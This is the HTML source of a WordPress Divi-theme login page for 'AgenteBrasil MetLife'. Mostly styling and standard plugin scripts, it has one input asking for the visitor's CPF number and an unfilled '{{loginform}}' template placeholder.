<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)  ]><!-->
<html lang="en-US">
<!--<![endif]-->

<head>
  <meta charset="UTF-8" />


  <link rel="pingback" href="http://agentebrasil.com/word2/wordpress/xmlrpc.php" />

  <!--[if lt IE 9]>
	<script src="http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/js/html5.js" type="text/javascript"></script>
	<![endif]-->

  <script type="text/javascript">
    document.documentElement.className = 'js';
  </script>

  <title>Login | AgenteBrasil MetLife</title>
  <meta name='robots' content='noindex,follow' />
  <link rel='dns-prefetch' href='//fonts.googleapis.com' />
  <link rel='dns-prefetch' href='//s.w.org' />
  <link rel="alternate" type="application/rss+xml" title="AgenteBrasil MetLife &raquo; Feed" href="http://agentebrasil.com/word2/wordpress/index.php/feed/"
  />
  <link rel="alternate" type="application/rss+xml" title="AgenteBrasil MetLife &raquo; Comments Feed" href="http://agentebrasil.com/word2/wordpress/index.php/comments/feed/"
  />
  <script type="text/javascript">
    window._wpemojiSettings = {
      "baseUrl": "https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/",
      "ext": ".png",
      "svgUrl": "https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/",
      "svgExt": ".svg",
      "source": {
        "concatemoji": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"
      }
    };
  </script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.min.js"></script>
  <meta content="Divi v.3.0.34" name="generator" />
  <style type="text/css">
    img.wp-smiley,
    img.emoji {
      display: inline !important;
      border: none !important;
      box-shadow: none !important;
      height: 1em !important;
      width: 1em !important;
      margin: 0 .07em !important;
      vertical-align: -0.1em !important;
      background: none !important;
      padding: 0 !important;
    }
    
    .featured-products__item .button-rounded.bt-quotation {
      display: block;
      margin-top: 10px;
    }
    
    .button-rounded.button-rounded__orange {
      color: #fff;
      background: #ff9e1b;
      border-color: #ff9e1b;
    }
    
    .button-rounded {
      display: inline-block;
      height: 40px;
      padding: 0 20px;
      font-size: 0.75rem;
      font-weight: bold;
      line-height: 2.5rem;
      text-align: center;
      text-decoration: none;
      text-transform: uppercase;
      letter-spacing: .0625em;
      cursor: pointer;
      border: 2px solid;
      border-radius: 20px;
      transition: all .3s ease;
    }
  </style>
  <link rel='stylesheet' id='et-gf-open-sans-css' href='http://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css'
    media='all' />
  <link rel='stylesheet' id='et_monarch-css-css' href='http://agentebrasil.com/word2/wordpress/wp-content/plugins/monarch/css/style.css?ver=1.3.2'
    type='text/css' media='all' />
  <link rel='stylesheet' id='divi-fonts-css' href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext'
    type='text/css' media='all' />
  <link rel='stylesheet' id='et-gf-source-sans-pro-css' href='http://fonts.googleapis.com/css?family=Source+Sans+Pro:400,200,200italic,300,300italic,400italic,600,600italic,700,700italic,900,900italic&#038;subset=latin,latin-ext'
    type='text/css' media='all' />
  <link rel='stylesheet' id='divi-style-css' href='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/style.css?ver=3.0.34'
    type='text/css' media='all' />
  <link rel='stylesheet' id='et-shortcodes-css-css' href='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/epanel/shortcodes/css/shortcodes.css?ver=3.0.34'
    type='text/css' media='all' />
  <link rel='stylesheet' id='et-shortcodes-responsive-css-css' href='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/epanel/shortcodes/css/shortcodes_responsive.css?ver=3.0.34'
    type='text/css' media='all' />
  <link rel='stylesheet' id='magnific-popup-css' href='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/styles/magnific_popup.css?ver=3.0.34'
    type='text/css' media='all' />
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
  <link rel='https://api.w.org/' href='http://agentebrasil.com/word2/wordpress/index.php/wp-json/' />
  <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://agentebrasil.com/word2/wordpress/xmlrpc.php?rsd"
  />
  <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://agentebrasil.com/word2/wordpress/wp-includes/wlwmanifest.xml"
  />
  <meta name="generator" content="WordPress 4.7.3" />
  <link rel="canonical" href="http://agentebrasil.com/word2/wordpress/index.php/login/" />
  <link rel='shortlink' href='http://agentebrasil.com/word2/wordpress/?p=1552' />
  <link rel="alternate" type="application/json+oembed" href="http://agentebrasil.com/word2/wordpress/index.php/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fagentebrasil.com%2Fword2%2Fwordpress%2Findex.php%2Flogin%2F"
  />
  <link rel="alternate" type="text/xml+oembed" href="http://agentebrasil.com/word2/wordpress/index.php/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fagentebrasil.com%2Fword2%2Fwordpress%2Findex.php%2Flogin%2F&#038;format=xml"
  />
  <style type="text/css" id="et-social-custom-css">

  </style>
  <style type="text/css" id="et-bloom-custom-css">
    .et_bloom .et_bloom_optin_1 .et_bloom_form_content {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_1 .et_bloom_form_container .et_bloom_form_header {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_1 .et_bloom_form_container {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_1 .et_bloom_form_content button {
      background-color: #353637 !important;
    }
    
    .et_bloom .et_bloom_optin_1 .et_bloom_border_dashed .et_bloom_form_container_wrapper {
      border-color: #ffffff !important
    }
    
    .et_bloom .et_bloom_optin_1 .et_bloom_form_content button {
      background-color: #353637 !important;
    }
    
    .et_bloom .et_bloom_optin_1 h2,
    .et_bloom .et_bloom_optin_1 h2 span,
    .et_bloom .et_bloom_optin_1 h2 strong {
      font-family: "Source Sans Pro", Helvetica, Arial, Lucida, sans-serif;
    }
    
    .et_bloom .et_bloom_optin_1 p,
    .et_bloom .et_bloom_optin_1 p span,
    .et_bloom .et_bloom_optin_1 p strong,
    .et_bloom .et_bloom_optin_1 form input,
    .et_bloom .et_bloom_optin_1 form button span {
      font-family: "Source Sans Pro", Helvetica, Arial, Lucida, sans-serif;
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_form_content {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_form_container .et_bloom_form_header {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_form_container {
      background-color: #16538c !important;
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_form_content button {
      background-color: #353637 !important;
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_border_dashed .et_bloom_form_container_wrapper {
      border-color: #ffffff !important
    }
    
    .et_bloom .et_bloom_optin_2 .et_bloom_form_content button {
      background-color: #353637 !important;
    }
    
    .et_bloom .et_bloom_optin_2 h2,
    .et_bloom .et_bloom_optin_2 h2 span,
    .et_bloom .et_bloom_optin_2 h2 strong {
      font-family: "Source Sans Pro", Helvetica, Arial, Lucida, sans-serif;
    }
    
    .et_bloom .et_bloom_optin_2 p,
    .et_bloom .et_bloom_optin_2 p span,
    .et_bloom .et_bloom_optin_2 p strong,
    .et_bloom .et_bloom_optin_2 form input,
    .et_bloom .et_bloom_optin_2 form button span {
      font-family: "Source Sans Pro", Helvetica, Arial, Lucida, sans-serif;
    }
  </style>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
  <style id="theme-customizer-css">
    body .et_pb_button,
    .woocommerce a.button.alt,
    .woocommerce-page a.button.alt,
    .woocommerce button.button.alt,
    .woocommerce-page button.button.alt,
    .woocommerce input.button.alt,
    .woocommerce-page input.button.alt,
    .woocommerce #respond input#submit.alt,
    .woocommerce-page #respond input#submit.alt,
    .woocommerce #content input.button.alt,
    .woocommerce-page #content input.button.alt,
    .woocommerce a.button,
    .woocommerce-page a.button,
    .woocommerce button.button,
    .woocommerce-page button.button,
    .woocommerce input.button,
    .woocommerce-page input.button,
    .woocommerce #respond input#submit,
    .woocommerce-page #respond input#submit,
    .woocommerce #content input.button,
    .woocommerce-page #content input.button,
    .woocommerce-message a.button.wc-forward {
      font-weight: bold;
      font-style: normal;
      text-transform: none;
      text-decoration: none;
      ;
    }
    
    body.et_pb_button_helper_class .et_pb_button,
    .woocommerce.et_pb_button_helper_class a.button.alt,
    .woocommerce-page.et_pb_button_helper_class a.button.alt,
    .woocommerce.et_pb_button_helper_class button.button.alt,
    .woocommerce-page.et_pb_button_helper_class button.button.alt,
    .woocommerce.et_pb_button_helper_class input.button.alt,
    .woocommerce-page.et_pb_button_helper_class input.button.alt,
    .woocommerce.et_pb_button_helper_class #respond input#submit.alt,
    .woocommerce-page.et_pb_button_helper_class #respond input#submit.alt,
    .woocommerce.et_pb_button_helper_class #content input.button.alt,
    .woocommerce-page.et_pb_button_helper_class #content input.button.alt,
    .woocommerce.et_pb_button_helper_class a.button,
    .woocommerce-page.et_pb_button_helper_class a.button,
    .woocommerce.et_pb_button_helper_class button.button,
    .woocommerce-page.et_pb_button_helper_class button.button,
    .woocommerce.et_pb_button_helper_class input.button,
    .woocommerce-page.et_pb_button_helper_class input.button,
    .woocommerce.et_pb_button_helper_class #respond input#submit,
    .woocommerce-page.et_pb_button_helper_class #respond input#submit,
    .woocommerce.et_pb_button_helper_class #content input.button,
    .woocommerce-page.et_pb_button_helper_class #content input.button {}
    
    @media only screen and ( min-width: 981px) {
      .et_header_style_centered.et_hide_primary_logo #main-header:not(.et-fixed-header) .logo_container,
      .et_header_style_centered.et_hide_fixed_logo #main-header.et-fixed-header .logo_container {
        height: 11.88px;
      }
    }
    
    @media only screen and ( min-width: 1350px) {
      .et_pb_row {
        padding: 27px 0;
      }
      .et_pb_section {
        padding: 54px 0;
      }
      .single.et_pb_pagebuilder_layout.et_full_width_page .et_post_meta_wrapper {
        padding-top: 81px;
      }
      .et_pb_section.et_pb_section_first {
        padding-top: inherit;
      }
      .et_pb_fullwidth_section {
        padding: 0;
      }
    }
    
    @media only screen and ( max-width: 980px) {
      #main-header,
      #main-header .nav li ul,
      .et-search-form,
      #main-header .et_mobile_menu {
        background-color: #191919;
      }
    }
    
    @media only screen and ( max-width: 767px) {}
  </style>


  <style class="et_heading_font">
    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      font-family: 'Source Sans Pro', Helvetica, Arial, Lucida, sans-serif;
    }
  </style>
  <style class="et_body_font">
    body,
    input,
    textarea,
    select {
      font-family: 'Source Sans Pro', Helvetica, Arial, Lucida, sans-serif;
    }
  </style>
  <style class="et_all_buttons_font">
    .et_pb_button {
      font-family: 'Source Sans Pro', Helvetica, Arial, Lucida, sans-serif;
    }
  </style>

  <style>
    .input_c {
      padding: 1px;
      border: none;
      border-bottom: solid 2px #c9c9c9;
      transition: border 0.3s;
      font-size: 25px;
    }
    
    #page-container,
    .et_non_fixed_nav.et_transparent_nav.et_show_nav.et_secondary_nav_enabled #page-container,
    .et_non_fixed_nav.et_transparent_nav.et_show_nav #page-container,
    #page-container,
    .et_fixed_nav.et_show_nav.et_secondary_nav_enabled #page-container,
    .et_fixed_nav.et_show_nav #page-container {
         padding-top: 0px !important;
    }
  </style>
  <style id="module-customizer-css">

  </style>

  <style type="text/css" id="custom-background-css">
    body.custom-background {
      background-color: #ededed;
    }
  </style>
</head>

<body class="page-template-default page page-id-1552 custom-background et_monarch et_bloom et_pb_button_helper_class et_fixed_nav et_hide_nav et_hide_primary_logo et_hide_fixed_logo et_hide_mobile_logo et_cover_background et_pb_gutter linux et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme unknown">
  <div id="page-container">
    <div id="et-main-area">
      <div id="main-content">



        <article id="post-1552" class="post-1552 page type-page status-publish hentry">


          <div class="entry-content">
            <div class="et_pb_section  et_pb_section_0 et_section_regular">



              <div class=" et_pb_row et_pb_row_0">

                <div class="et_pb_column et_pb_column_4_4  et_pb_column_0">

                  <div class="et_pb_module et-waypoint et_pb_image et_pb_animation_off et_pb_image_0 et_always_center_on_mobile">
                    <img src="http://agentebrasil.com/word2/wordpress/wp-content/uploads/2017/03/logo_azul_h.jpg" alt="" />

                  </div>
                  <div class="et_pb_text et_pb_module et_pb_bg_layout_light et_pb_text_align_center  et_pb_text_0">

                    <p style="text-align: center;"><strong>Oi. Acesse o seu canal com segurança. Responda rapidinho.</strong></p>

                  </div>
                  <!-- .et_pb_text -->
                  <div class="et_pb_module et_pb_space et_pb_divider_0 et-hide-mobile"></div>
                  <div class="et_pb_module et-waypoint et_pb_image et_pb_animation_off et_pb_image_1 et_always_center_on_mobile">
                    <div class="login_form" style="font-size:14px;">
                      <p style="font-size:25px;">
                        Meu CPF é: <input type="" class="input_c" style="margin-top:20px;" id="cpf" maxlength="11" placeholder="000.000.000-00">                        {{loginform}}
                      </p>
                    </div>
                  </div>
                  <div class="et_pb_code et_pb_module  et_pb_code_0">
                  </div>
                  <!-- .et_pb_code -->
                </div>
                <!-- .et_pb_column -->

              </div>
              <!-- .et_pb_row -->

            </div>
            <!-- .et_pb_section -->
            <span class="et_bloom_bottom_trigger"></span> </div>
          <!-- .entry-content -->


        </article>
        <!-- .et_pb_post -->



      </div>
      <!-- #main-content -->



      <!-- #main-footer -->
    </div>
    <!-- #et-main-area -->


  </div>
  <script>
  </script>
  <!-- #page-container -->
  <style type="text/css" id="et-builder-advanced-style">
    .et_pb_divider_0 {
      height: 5px;
    }
    
    .et_pb_image_1 {
      text-align: center;
    }
    
    .et_pb_text_0 {
      font-family: 'Source Sans Pro', Helvetica, Arial, Lucida, sans-serif;
      font-weight: 300;
      font-size: 30px;
      line-height: 1.1em;
    }
    
    .et_pb_text_0 p {
      line-height: 1.1em;
    }
    
    .et_pb_text_0 h1 {
      font-size: 30px;
      color: #48535b !important;
      line-height: 1.1em;
    }
    
    .et_pb_text_0.et_pb_text {
      color: #48535b !important;
    }
    
    .et_pb_image_0 {
      max-width: 160px;
      text-align: center;
    }
  </style>
  <style type="text/css" id="et-builder-page-custom-style">
    .et_pb_bg_layout_dark {
      color: #ffffff !important;
    }
    
    .page.et_pb_pagebuilder_layout #main-content {
      background-color: rgba(255, 255, 255, 0);
    }
    
    .et_pb_section {
      background-color: #ffffff;
    }
  </style>
  <link rel='stylesheet' id='et_bloom-css-css' href='http://agentebrasil.com/word2/wordpress/wp-content/plugins/bloom/css/style.css?ver=1.1.8'
    type='text/css' media='all' />
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/frontend-builder-global-functions.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.3.2'></script>
  <script>
    var monarchSettings = {
      "ajaxurl": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-admin\/admin-ajax.php",
      "pageurl": "http:\/\/agentebrasil.com\/word2\/wordpress\/index.php\/login\/",
      "stats_nonce": "709b8d7a4d",
      "share_counts": "f740bf29ef",
      "follow_counts": "c4a43c9cfb",
      "total_counts": "9c8bf8b5e5",
      "media_single": "c4cc05455e",
      "media_total": "30df99e2dc",
      "generate_all_window_nonce": "3f025fd9ba",
      "no_img_message": "No images available for sharing on this page"
    };
  </script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/plugins/monarch/js/custom.js?ver=1.3.2'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/jquery.mobile.custom.min.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/js/custom.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/jquery.fitvids.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/waypoints.min.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/jquery.magnific-popup.js?ver=3.0.34'></script>
  <script>
    var et_pb_custom = {
      "ajaxurl": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-admin\/admin-ajax.php",
      "images_uri": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-content\/themes\/Divi\/images",
      "builder_images_uri": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-content\/themes\/Divi\/includes\/builder\/images",
      "et_frontend_nonce": "7f0658b542",
      "subscription_failed": "Please, check the fields below to make sure you entered the correct information.",
      "et_ab_log_nonce": "9847a0d667",
      "fill_message": "Please, fill in the following fields:",
      "contact_error_message": "Please, fix the following errors:",
      "invalid": "Invalid email",
      "captcha": "Captcha",
      "prev": "Prev",
      "previous": "Previous",
      "next": "Next",
      "wrong_captcha": "You entered the wrong number in captcha.",
      "is_builder_plugin_used": "",
      "ignore_waypoints": "no",
      "is_divi_theme_used": "1",
      "widget_search_selector": ".widget_search",
      "is_ab_testing_active": "",
      "page_id": "1552",
      "unique_test_id": "",
      "ab_bounce_rate": "5",
      "is_cache_plugin_active": "no",
      "is_shortcode_tracking": ""
    };
  </script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/themes/Divi/includes/builder/scripts/frontend-builder-scripts.js?ver=3.0.34'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-includes/js/wp-embed.min.js?ver=4.7.3'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/plugins/bloom/js/jquery.uniform.min.js?ver=1.1.8'></script>
  <script>
    var bloomSettings = {
      "ajaxurl": "http:\/\/agentebrasil.com\/word2\/wordpress\/wp-admin\/admin-ajax.php",
      "pageurl": "http:\/\/agentebrasil.com\/word2\/wordpress\/index.php\/login\/",
      "stats_nonce": "96f01df8db",
      "subscribe_nonce": "11a6b24121",
      "is_user_logged_in": "not_logged"
    };
  </script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/plugins/bloom/js/custom.js?ver=1.1.8'></script>
  <script type='text/javascript' src='http://agentebrasil.com/word2/wordpress/wp-content/plugins/bloom/js/idle-timer.min.js?ver=1.1.8'></script>
</body>

</html>